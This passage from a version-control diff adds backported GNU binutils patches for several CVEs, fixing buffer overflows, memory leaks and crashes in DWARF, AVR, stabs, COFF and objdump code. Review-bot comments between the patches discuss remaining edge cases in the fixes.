362+ tmpname = make_tempname (input_filename, &tmpfd);
363 else
364 tmpname = output_filename;
365
366@@ -5847,14 +5857,13 @@ copy_main (int argc, char *argv[])
367 fatal (_("warning: could not create temporary file whilst copying '%s', (error: %s)"),
368 input_filename, strerror (errno));
369
370- copy_file (input_filename, tmpname, input_target, output_target, input_arch);
371+ copy_file (input_filename, tmpname, tmpfd, input_target, output_target,
372+ input_arch);
373 if (status == 0)
374 {
375- if (preserve_dates)
376- set_times (tmpname, &statbuf);
377 if (tmpname != output_filename)
378 status = (smart_rename (tmpname, input_filename,
379- preserve_dates) != 0);
380+ preserve_dates ? &statbuf : NULL) != 0);
381 }
382 else
383 unlink_if_ordinary (tmpname);
384diff --git a/binutils/rename.c b/binutils/rename.c
385index bf3b68d0462..07d44d0f314 100644
386--- a/binutils/rename.c
387+++ b/binutils/rename.c
388@@ -24,14 +24,9 @@
389
390 #ifdef HAVE_GOOD_UTIME_H
391 #include <utime.h>
392-#else /* ! HAVE_GOOD_UTIME_H */
393-#ifdef HAVE_UTIMES
394+#elif defined HAVE_UTIMES
395 #include <sys/time.h>
396-#endif /* HAVE_UTIMES */
397-#endif /* ! HAVE_GOOD_UTIME_H */
398-
399-#if ! defined (_WIN32) || defined (__CYGWIN32__)
400-static int simple_copy (const char *, const char *);
401+#endif
402
403 /* The number of bytes to copy at once. */
404 #define COPY_BUF 8192
405@@ -82,7 +77,6 @@ simple_copy (const char *from, const char *to)
406 }
407 return 0;
408 }
409-#endif /* __CYGWIN32__ or not _WIN32 */
410
411 /* Set the times of the file DESTINATION to be the same as those in
412 STATBUF. */
413@@ -91,122 +85,52 @@ void
414 set_times (const char *destination, const struct stat *statbuf)
415 {
416 int result;
417-
418- {
419 #ifdef HAVE_GOOD_UTIME_H
420- struct utimbuf tb;
421-
422- tb.actime = statbuf->st_atime;
423- tb.modtime = statbuf->st_mtime;
424- result = utime (destination, &tb);
425-#else /* ! HAVE_GOOD_UTIME_H */
426-#ifndef HAVE_UTIMES
427- long tb[2];
428-
429- tb[0] = statbuf->st_atime;
430- tb[1] = statbuf->st_mtime;
431- result = utime (destination, tb);
432-#else /* HAVE_UTIMES */
433- struct timeval tv[2];
434-
435- tv[0].tv_sec = statbuf->st_atime;
436- tv[0].tv_usec = 0;
437- tv[1].tv_sec = statbuf->st_mtime;
438- tv[1].tv_usec = 0;
439- result = utimes (destination, tv);
440-#endif /* HAVE_UTIMES */
441-#endif /* ! HAVE_GOOD_UTIME_H */
442- }
443+ struct utimbuf tb;
444+
445+ tb.actime = statbuf->st_atime;
446+ tb.modtime = statbuf->st_mtime;
447+ result = utime (destination, &tb);
448+#elif defined HAVE_UTIMES
449+ struct timeval tv[2];
450+
451+ tv[0].tv_sec = statbuf->st_atime;
452+ tv[0].tv_usec = 0;
453+ tv[1].tv_sec = statbuf->st_mtime;
454+ tv[1].tv_usec = 0;
455+ result = utimes (destination, tv);
456+#else
457+ long tb[2];
458+
459+ tb[0] = statbuf->st_atime;
460+ tb[1] = statbuf->st_mtime;
461+ result = utime (destination, tb);
462+#endif
463
464 if (result != 0)
465 non_fatal (_("%s: cannot set time: %s"), destination, strerror (errno));
466 }
467
468-#ifndef S_ISLNK
469-#ifdef S_IFLNK
470-#define S_ISLNK(m) (((m) & S_IFMT) == S_IFLNK)
471-#else
472-#define S_ISLNK(m) 0
473-#define lstat stat
474-#endif
475-#endif
476-
477-/* Rename FROM to TO, copying if TO is a link.
478- Return 0 if ok, -1 if error. */
479+/* Copy FROM to TO. TARGET_STAT has the file status that, if non-NULL,
480+ is used to fix up timestamps. Return 0 if ok, -1 if error.
481+ At one time this function renamed files, but file permissions are
482+ tricky to update given the number of different schemes used by
483+ various systems. So now we just copy. */
484
485 int
486-smart_rename (const char *from, const char *to, int preserve_dates ATTRIBUTE_UNUSED)
487+smart_rename (const char *from, const char *to,
488+ struct stat *target_stat)
489 {
490- bfd_boolean exists;
491- struct stat s;
492- int ret = 0;
493-
494- exists = lstat (to, &s) == 0;
495-
496-#if defined (_WIN32) && !defined (__CYGWIN32__)
497- /* Win32, unlike unix, will not erase `to' in `rename(from, to)' but
498- fail instead. Also, chown is not present. */
499+ int ret;
500
501- if (exists)
502- remove (to);
503-
504- ret = rename (from, to);
505+ ret = simple_copy (from, to);
506 if (ret != 0)
507- {
508- /* We have to clean up here. */
509- non_fatal (_("unable to rename '%s'; reason: %s"), to, strerror (errno));
510- unlink (from);
511- }
512-#else
513- /* Use rename only if TO is not a symbolic link and has
514- only one hard link, and we have permission to write to it. */
515- if (! exists
516- || (!S_ISLNK (s.st_mode)
517- && S_ISREG (s.st_mode)
518- && (s.st_mode & S_IWUSR)
519- && s.st_nlink == 1)
520- )
521- {
522- ret = rename (from, to);
523- if (ret == 0)
524- {
525- if (exists)
526- {
527- /* Try to preserve the permission bits and ownership of
528- TO. First get the mode right except for the setuid
529- bit. Then change the ownership. Then fix the setuid
530- bit. We do the chmod before the chown because if the
531- chown succeeds, and we are a normal user, we won't be
532- able to do the chmod afterward. We don't bother to
533- fix the setuid bit first because that might introduce
534- a fleeting security problem, and because the chown
535- will clear the setuid bit anyhow. We only fix the
536- setuid bit if the chown succeeds, because we don't
537- want to introduce an unexpected setuid file owned by
538- the user running objcopy. */
539- chmod (to, s.st_mode & 0777);
540- if (chown (to, s.st_uid, s.st_gid) >= 0)
541- chmod (to, s.st_mode & 07777);
542- }
543- }
544- else
545- {
546- /* We have to clean up here. */
547- non_fatal (_("unable to rename '%s'; reason: %s"), to, strerror (errno));
548- unlink (from);
549- }
550- }
551- else
552- {
553- ret = simple_copy (from, to);
554- if (ret != 0)
555- non_fatal (_("unable to copy file '%s'; reason: %s"), to, strerror (errno));
556+ non_fatal (_("unable to copy file '%s'; reason: %s"),
557+ to, strerror (errno));
558
559- if (preserve_dates)
560- set_times (to, &s);
561- unlink (from);
562- }
563-#endif /* _WIN32 && !__CYGWIN32__ */
564+ if (target_stat != NULL)
565+ set_times (to, target_stat);
566+ unlink (from);
567
568 return ret;
569 }
570--
5712.17.1
572
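diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch
new file mode 100644
index 0000000000..1502d03f43
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch
@@ -0,0 +1,83 @@
+From 647cebce12a6b0a26960220caff96ff38978cf24 Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Thu, 26 Nov 2020 17:08:33 +0000
+Subject: [PATCH] Prevent a memory allocation failure when parsing corrupt
+ DWARF debug sections.
+
+ PR 26946
+ * dwarf2.c (read_section): Check for debug sections with excessive
+ sizes.
+
+
+Upstream-Status: Backport [
+https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=647cebce12a6b0a26960220caff96ff38978cf24
+]
+CVE: CVE-2021-3487
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ bfd/dwarf2.c | 25 +++++++++++++++++++------
+ 1 files changed, 25 insertions(+), 6 deletions(-)
+
+diff --git a/bfd/dwarf2.c b/bfd/dwarf2.c
+index 977bf43a6a1..8bbfc81d3e7 100644
+--- a/bfd/dwarf2.c
++++ b/bfd/dwarf2.c
+@@ -531,22 +531,24 @@ read_section (bfd * abfd,
+ bfd_byte ** section_buffer,
+ bfd_size_type * section_size)
+ {
+- asection *msec;
+ const char *section_name = sec->uncompressed_name;
+ bfd_byte *contents = *section_buffer;
+- bfd_size_type amt;
+
+ /* The section may have already been read. */
+ if (contents == NULL)
+ {
++ bfd_size_type amt;
++ asection *msec;
++ ufile_ptr filesize;
++
+ msec = bfd_get_section_by_name (abfd, section_name);
+- if (! msec)
++ if (msec == NULL)
+ {
+ section_name = sec->compressed_name;
+ if (section_name != NULL)
+ msec = bfd_get_section_by_name (abfd, section_name);
+ }
+- if (! msec)
++ if (msec == NULL)
+ {
+ _bfd_error_handler (_("DWARF error: can't find %s section."),
+ sec->uncompressed_name);
+@@ -554,12 +556,23 @@ read_section (bfd * abfd,
+ return FALSE;
+ }
+
+- *section_size = msec->rawsize ? msec->rawsize : msec->size;
++ amt = bfd_get_section_limit_octets (abfd, msec);
++ filesize = bfd_get_file_size (abfd);
++ if (amt >= filesize)
++ {
++ /* PR 26946 */
++ _bfd_error_handler (_("DWARF error: section %s is larger than its filesize! (0x%lx vs 0x%lx)"),
++ section_name, (long) amt, (long) filesize);
++ bfd_set_error (bfd_error_bad_value);
++ return FALSE;
++ }
++ *section_size = amt;
+ /* Paranoia - alloc one extra so that we can make sure a string
+ section is NUL terminated. */
+- amt = *section_size + 1;
++ amt += 1;
+ if (amt == 0)
+ {
++ /* Paranoia - this should never happen. */
+ bfd_set_error (bfd_error_no_memory);
+ return FALSE;
+ }
+--
+2.27.0
+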
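Review bot: The new size check in read_section, `if (amt >= filesize)`, has no guard for a file size of zero, so if bfd_get_file_size returns 0 when the size cannot be determined, every debug section would be rejected as oversized. The objdump.c check added by CVE-2022-48063.patch in this same commit tests `bfd_get_size (abfd) != 0` first; the same shape here would be `if (filesize != 0 && amt >= filesize)`. The error message also casts both values to `long` for `0x%lx`, which truncates a 64-bit bfd_size_type on hosts where long is 32 bits, so the reported sizes can be misleading there. read_section continues past the end of the hunk.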
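diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch
new file mode 100644
index 0000000000..5f56dd7696
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch
@@ -0,0 +1,183 @@
+From 1cfcf3004e1830f8fe9112cfcd15285508d2c2b7 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 11 Feb 2021 16:56:42 +1030
+Subject: [PATCH] PR27290, PR27293, PR27295, various avr objdump fixes
+
+Adds missing sanity checks for avr device info note, to avoid
+potential buffer overflows. Uses bfd_malloc_and_get_section for
+sanity checking section size.
+
+ PR 27290
+ PR 27293
+ PR 27295
+ * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting.
+ Use bfd_malloc_and_get_section.
+ (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity
+ check namesz. Return NULL if descsz is too small. Ensure
+ string table is terminated.
+ (elf32_avr_get_device_info): Formatting. Add note_size param.
+ Sanity check note.
+ (elf32_avr_dump_mem_usage): Adjust to suit.
+
+Upstream-Status: Backport
+CVE: CVE-2021-3549
+Signed-of-by: Armin Kuster <akuster@mvista.com>
+
+---
+diff --git a/binutils/ChangeLog b/binutils/ChangeLog
+index 1e9a96c9bb6..02e5019204e 100644
+--- a/binutils/ChangeLog
++++ b/binutils/ChangeLog
+@@ -1,3 +1,17 @@
++2021-02-11 Alan Modra <amodra@gmail.com>
++
++ PR 27290
++ PR 27293
++ PR 27295
++ * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting.
++ Use bfd_malloc_and_get_section.
++ (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity
++ check namesz. Return NULL if descsz is too small. Ensure
++ string table is terminated.
++ (elf32_avr_get_device_info): Formatting. Add note_size param.
++ Sanity check note.
++ (elf32_avr_dump_mem_usage): Adjust to suit.
++
+ 2020-03-25 H.J. Lu <hongjiu.lu@intel.com>
+
+ * ar.c (main): Update bfd_plugin_set_program_name call.
+diff --git a/binutils/od-elf32_avr.c b/binutils/od-elf32_avr.c
+index 5ec99957fe9..1d32bce918e 100644
+--- a/binutils/od-elf32_avr.c
++++ b/binutils/od-elf32_avr.c
+@@ -77,23 +77,29 @@ elf32_avr_filter (bfd *abfd)
+ return bfd_get_flavour (abfd) == bfd_target_elf_flavour;
+ }
+
+-static char*
++static char *
+ elf32_avr_get_note_section_contents (bfd *abfd, bfd_size_type *size)
+ {
+ asection *section;
++ bfd_byte *contents;
+
+- if ((section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo")) == NULL)
++ section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo");
++ if (section == NULL)
+ return NULL;
+
+- *size = bfd_section_size (section);
+- char *contents = (char *) xmalloc (*size);
+- bfd_get_section_contents (abfd, section, contents, 0, *size);
++ if (!bfd_malloc_and_get_section (abfd, section, &contents))
++ {
++ free (contents);
++ contents = NULL;
++ }
+
+- return contents;
++ *size = bfd_section_size (section);
++ return (char *) contents;
+ }
+
+-static char* elf32_avr_get_note_desc (bfd *abfd, char *contents,
+- bfd_size_type size)
++static char *
++elf32_avr_get_note_desc (bfd *abfd, char *contents, bfd_size_type size,
++ bfd_size_type *descsz)
+ {
+ Elf_External_Note *xnp = (Elf_External_Note *) contents;
+ Elf_Internal_Note in;
+@@ -107,42 +113,54 @@ static char* elf32_avr_get_note_desc (bfd *abfd, char *contents,
+ if (in.namesz > contents - in.namedata + size)
+ return NULL;
+
++ if (in.namesz != 4 || strcmp (in.namedata, "AVR") != 0)
++ return NULL;
++
+ in.descsz = bfd_get_32 (abfd, xnp->descsz);
+ in.descdata = in.namedata + align_power (in.namesz, 2);
+- if (in.descsz != 0
+- && (in.descdata >= contents + size
+- || in.descsz > contents - in.descdata + size))
++ if (in.descsz < 6 * sizeof (uint32_t)
++ || in.descdata >= contents + size
++ || in.descsz > contents - in.descdata + size)
+ return NULL;
+
+- if (strcmp (in.namedata, "AVR") != 0)
+- return NULL;
++ /* If the note has a string table, ensure it is 0 terminated. */
++ if (in.descsz > 8 * sizeof (uint32_t))
++ in.descdata[in.descsz - 1] = 0;
+
++ *descsz = in.descsz;
+ return in.descdata;
+ }
+
+ static void
+ elf32_avr_get_device_info (bfd *abfd, char *description,
+- deviceinfo *device)
++ bfd_size_type desc_size, deviceinfo *device)
+ {
+ if (description == NULL)
+ return;
+
+ const bfd_size_type memory_sizes = 6;
+
+- memcpy (device, description, memory_sizes * sizeof(uint32_t));
+- device->name = NULL;
++ memcpy (device, description, memory_sizes * sizeof (uint32_t));
++ desc_size -= memory_sizes * sizeof (uint32_t);
++ if (desc_size < 8)
++ return;
+
+- uint32_t *stroffset_table = ((uint32_t *) description) + memory_sizes;
++ uint32_t *stroffset_table = (uint32_t *) description + memory_sizes;
+ bfd_size_type stroffset_table_size = bfd_get_32 (abfd, stroffset_table);
+- char *str_table = ((char *) stroffset_table) + stroffset_table_size;
+
+ /* If the only content is the size itself, there's nothing in the table */
+- if (stroffset_table_size == 4)
++ if (stroffset_table_size < 8)
+ return;
++ if (desc_size <= stroffset_table_size)
++ return;
++ desc_size -= stroffset_table_size;
+
+ /* First entry is the device name index. */
+ uint32_t device_name_index = bfd_get_32 (abfd, stroffset_table + 1);
++ if (device_name_index >= desc_size)
++ return;
+
++ char *str_table = (char *) stroffset_table + stroffset_table_size;
+ device->name = str_table + device_name_index;
+ }
+
+@@ -183,7 +201,7 @@ static void
+ elf32_avr_dump_mem_usage (bfd *abfd)
+ {
+ char *description = NULL;
+- bfd_size_type note_section_size = 0;
++ bfd_size_type sec_size, desc_size;
+
+ deviceinfo device = { 0, 0, 0, 0, 0, 0, NULL };
+ device.name = "Unknown";
+@@ -192,13 +210,13 @@ elf32_avr_dump_mem_usage (bfd *abfd)
+ bfd_size_type text_usage = 0;
+ bfd_size_type eeprom_usage = 0;
+
+- char *contents = elf32_avr_get_note_section_contents (abfd,
+- &note_section_size);
++ char *contents = elf32_avr_get_note_section_contents (abfd, &sec_size);
+
+ if (contents != NULL)
+ {
+- description = elf32_avr_get_note_desc (abfd, contents, note_section_size);
+- elf32_avr_get_device_info (abfd, description, &device);
++ description = elf32_avr_get_note_desc (abfd, contents, sec_size,
++ &desc_size);
++ elf32_avr_get_device_info (abfd, description, desc_size, &device);
+ }
+
+ elf32_avr_get_memory_usage (abfd, &text_usage, &data_usage,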
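Review bot: In elf32_avr_dump_mem_usage, `desc_size` is declared without an initialiser and elf32_avr_get_note_desc stores to `*descsz` only on its success path, so when it returns NULL the next call passes an indeterminate value to elf32_avr_get_device_info. The callee returns early on `description == NULL`, so the value is never used, but the read of an uninitialised variable remains and is likely to trip -Wmaybe-uninitialized; `bfd_size_type sec_size, desc_size = 0;` would remove it. Separately, the patch header's trailer is spelled `Signed-of-by:` and its `Upstream-Status: Backport` line carries no upstream URL, unlike the other patches added in this commit.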
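diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch
new file mode 100644
index 0000000000..2addf5139e
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch
@@ -0,0 +1,35 @@
+From 46322722ad40ac1a75672ae0f62f4969195f1368 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 20 Jan 2022 13:58:38 +1030
+Subject: [PATCH] PR28753, buffer overflow in read_section_stabs_debugging_info
+
+ PR 28753
+ * rddbg.c (read_section_stabs_debugging_info): Don't read past
+ end of section when concatentating stab strings.
+
+CVE: CVE-2021-46174
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=cad4d6b91e97]
+
+(cherry picked from commit 085b299b71721e15f5c5c5344dc3e4e4536dadba)
+(cherry picked from commit cad4d6b91e97b6962807d33c04ed7e7797788438)
+Signed-off-by: poojitha adireddy <pooadire@cisco.com>
+---
+ binutils/rddbg.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/binutils/rddbg.c b/binutils/rddbg.c
+index 72e934055b5..5e76d94a3c4 100644
+--- a/binutils/rddbg.c
++++ b/binutils/rddbg.c
+@@ -207,7 +207,7 @@ read_section_stabs_debugging_info (bfd *abfd, asymbol **syms, long symcount,
+ an attempt to read the byte before 'strings' would occur. */
+ while ((len = strlen (s)) > 0
+ && s[len - 1] == '\\'
+- && stab + 12 < stabs + stabsize)
++ && stab + 16 <= stabs + stabsize)
+ {
+ char *p;
+
+--
+2.23.1
+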
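Review bot: The corrected bound `stab + 16 <= stabs + stabsize` in read_section_stabs_debugging_info is a bare constant, and nothing near it says why 16 rather than the 12 it replaces is the right limit. A one-line comment above the condition would help the next reader, for example `/* The body reads the next entry's 4-byte string index, so 12 + 4 bytes must remain.  */`, assuming that is the access the loop body makes. The body lies outside the hunk, so the wording should be confirmed against it.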
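diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch
new file mode 100644
index 0000000000..102d65f8a6
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch
@@ -0,0 +1,37 @@
+From ef186fe54aa6d281a3ff8a9528417e5cc614c797 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Sat, 13 Aug 2022 15:32:47 +0930
+Subject: [PATCH] PR29482 - strip: heap-buffer-overflow
+
+ PR 29482
+ * coffcode.h (coff_set_section_contents): Sanity check _LIB.
+
+CVE: CVE-2022-38533
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=ef186fe54aa6d281a3ff8a9528417e5cc614c797]
+
+Signed-off-by: Florin Diaconescu <florin.diaconescu009@gmail.com>
+
+---
+ bfd/coffcode.h | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/bfd/coffcode.h b/bfd/coffcode.h
+index dec2e9c6370..75c18d88602 100644
+--- a/bfd/coffcode.h
++++ b/bfd/coffcode.h
+@@ -4170,10 +4170,13 @@ coff_set_section_contents (bfd * abfd,
+
+ rec = (bfd_byte *) location;
+ recend = rec + count;
+- while (rec < recend)
++ while (recend - rec >= 4)
+ {
++ size_t len = bfd_get_32 (abfd, rec);
++ if (len == 0 || len > (size_t) (recend - rec) / 4)
++ break;
++ rec += len * 4;
+ ++section->lma;
+- rec += bfd_get_32 (abfd, rec) * 4;
+ }
+
+ BFD_ASSERT (rec == recend);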
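Review bot: When the new sanity check in coff_set_section_contents rejects a record (`len == 0`, or a length running past `recend`), the loop only breaks, and the sole signal is the following `BFD_ASSERT (rec == recend)`, so a malformed _LIB section is reported as an internal assertion rather than as bad input. Unless BFD_ASSERT stops execution, the function then carries on with `section->lma` counting only the records parsed so far. Consider failing explicitly at the break, e.g. `bfd_set_error (bfd_error_bad_value); return FALSE;`, provided callers tolerate a failure return at this point. The rest of the function is outside the hunk.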
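diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch
new file mode 100644
index 0000000000..ddb564bc8c
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch
@@ -0,0 +1,32 @@
+From 0ebc886149c22aceaf8ed74267821a59ca9d03eb Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Jun 2022 09:00:41 +0930
+Subject: [PATCH] PR29254, memory leak in stab_demangle_v3_arg
+
+ PR 29254
+ * stabs.c (stab_demangle_v3_arg): Free dt on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=0ebc886149c22aceaf8ed74267821a59ca9d03eb]
+CVE: CVE-2022-47007
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/stabs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 2b5241637c1..796ff85b86a 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -5476,7 +5476,10 @@
+ dc->u.s_binary.right,
+ &varargs);
+ if (pargs == NULL)
+- return NULL;
++ {
++ free (dt);
++ return NULL;
++ }
+
+ return debug_make_function_type (dhandle, dt, pargs, varargs);
+ }
+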
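diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch
new file mode 100644
index 0000000000..9527390ccf
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch
@@ -0,0 +1,64 @@
+From d6e1d48c83b165c129cb0aa78905f7ca80a1f682 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Jun 2022 09:13:38 +0930
+Subject: [PATCH] PR29255, memory leak in make_tempdir
+
+ PR 29255
+ * bucomm.c (make_tempdir, make_tempname): Free template on all
+ failure paths.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=d6e1d48c83b165c129cb0aa78905f7ca80a1f682]
+CVE: CVE-2022-47008
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/bucomm.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+diff --git a/binutils/bucomm.c b/binutils/bucomm.c
+index fdc2209df9c..4395cb9f7f5 100644
+--- a/binutils/bucomm.c
++++ b/binutils/bucomm.c
+@@ -542,8 +542,9 @@
+ #else
+ tmpname = mktemp (tmpname);
+ if (tmpname == NULL)
+- return NULL;
+- fd = open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);
++ fd = -1;
++ else
++ fd = open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);
+ #endif
+ if (fd == -1)
+ {
+@@ -561,22 +562,23 @@
+ make_tempdir (const char *filename)
+ {
+ char *tmpname = template_in_dir (filename);
++ char *ret;
+
+ #ifdef HAVE_MKDTEMP
+- return mkdtemp (tmpname);
++ ret = mkdtemp (tmpname);
+ #else
+- tmpname = mktemp (tmpname);
+- if (tmpname == NULL)
+- return NULL;
++ ret = mktemp (tmpname);
+ #if defined (_WIN32) && !defined (__CYGWIN32__)
+ if (mkdir (tmpname) != 0)
+- return NULL;
++ ret = NULL;
+ #else
+ if (mkdir (tmpname, 0700) != 0)
+- return NULL;
++ ret = NULL;
+ #endif
+- return tmpname;
+ #endif
++ if (ret == NULL)
++ free (tmpname);
++ return ret;
+ }
+
+ /* Parse a string into a VMA, with a fatal error if it can't be
+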
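Review bot: In the first hunk (the mktemp fallback that the ChangeLog attributes to make_tempname) the result of mktemp is still assigned back to `tmpname`, so when mktemp returns NULL the pointer to the template buffer is lost before the `fd == -1` cleanup runs, and a `free (tmpname)` there would free NULL and leave the buffer allocated. make_tempdir in the second hunk avoids this by keeping the result in a separate `ret`; the same shape here, `char *ret = mktemp (tmpname);` followed by `fd = ret == NULL ? -1 : open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);`, would match the stated intent of freeing the template on all failure paths. In make_tempdir's fallback branch, mkdir is now attempted even after mktemp has failed; `if (ret != NULL && mkdir (tmpname, 0700) != 0)` would keep the earlier behaviour. The cleanup block after `if (fd == -1)` is outside the hunk, so the first point should be checked against it.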
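diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch
new file mode 100644
index 0000000000..d831ed4756
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch
@@ -0,0 +1,34 @@
+From 0d02e70b197c786f26175b9a73f94e01d14abdab Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 20 Jun 2022 10:39:31 +0930
+Subject: [PATCH] PR29262, memory leak in pr_function_type
+
+ PR 29262
+ * prdbg.c (pr_function_type): Free "s" on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=0d02e70b197c786f26175b9a73f94e01d14abdab]
+CVE: CVE-2022-47010
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/prdbg.c | 7 ++-----
+ 1 file changed, 2 insertions(+), 5 deletions(-)
+
+diff --git a/binutils/prdbg.c b/binutils/prdbg.c
+index c1e41628d26..bb42a5b6c2d 100644
+--- a/binutils/prdbg.c
++++ b/binutils/prdbg.c
+@@ -778,12 +778,9 @@
+
+ strcat (s, ")");
+
+- if (! substitute_type (info, s))
+- return FALSE;
+-
++ bfd_boolean ret = substitute_type (info, s);
+ free (s);
+-
+- return TRUE;
++ return ret;
+ }
+
+ /* Turn the top type on the stack into a reference to that type. */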
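diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch
new file mode 100644
index 0000000000..250756bd38
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch
@@ -0,0 +1,31 @@
+From 8a24927bc8dbf6beac2000593b21235c3796dc35 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 20 Jun 2022 10:39:13 +0930
+Subject: [PATCH] PR29261, memory leak in parse_stab_struct_fields
+
+ PR 29261
+ * stabs.c (parse_stab_struct_fields): Free "fields" on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=8a24927bc8dbf6beac2000593b21235c3796dc35]
+CVE: CVE-2022-47011
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/stabs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 796ff85b86a..bf3f578cbcc 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -2368,7 +2368,10 @@
+
+ if (! parse_stab_one_struct_field (dhandle, info, pp, p, fields + c,
+ staticsp, p_end))
+- return FALSE;
++ {
++ free (fields);
++ return FALSE;
++ }
+
+ ++c;
+ }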
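diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch
new file mode 100644
index 0000000000..101a4cdb4e
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch
@@ -0,0 +1,57 @@
+From 3d3af4ba39e892b1c544d667ca241846bc3df386 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Sun, 4 Dec 2022 22:15:40 +1030
+Subject: [PATCH] PR29846, segmentation fault in objdump.c compare_symbols
+
+Fixes a fuzzed object file problem where plt relocs were manipulated
+in such a way that two synthetic symbols were generated at the same
+plt location. Won't occur in real object files.
+
+ PR 29846
+ PR 20337
+ * objdump.c (compare_symbols): Test symbol flags to exclude
+ section and synthetic symbols before attempting to check flavour.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff;h=3d3af4ba39e892b1c544d667ca241846bc3df386]
+CVE: CVE-2022-47695
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/objdump.c | 23 ++++++++++-------------
+ 1 file changed, 10 insertions(+), 13 deletions(-)
+
+diff --git a/binutils/objdump.c b/binutils/objdump.c
+index e8481b2d928..d95c8b68bf0 100644
+--- a/binutils/objdump.c
++++ b/binutils/objdump.c
+@@ -935,20 +935,17 @@
+ return 1;
+ }
+
+- if (bfd_get_flavour (bfd_asymbol_bfd (a)) == bfd_target_elf_flavour
++ /* Sort larger size ELF symbols before smaller. See PR20337. */
++ bfd_vma asz = 0;
++ if ((a->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0
++ && bfd_get_flavour (bfd_asymbol_bfd (a)) == bfd_target_elf_flavour)
++ asz = ((elf_symbol_type *) a)->internal_elf_sym.st_size;
++ bfd_vma bsz = 0;
++ if ((b->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0
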